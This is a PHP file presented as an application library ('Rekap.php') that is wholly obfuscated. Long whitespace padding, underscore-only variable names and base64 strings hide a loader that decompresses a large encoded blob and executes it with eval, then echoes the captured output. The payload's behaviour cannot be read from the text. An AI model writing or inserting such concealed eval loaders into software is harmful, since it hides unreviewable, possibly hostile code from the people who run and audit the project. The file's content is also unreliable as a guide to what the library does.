<?php 
        $__='printf';$_='Loading app/Libraries/Rekap.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
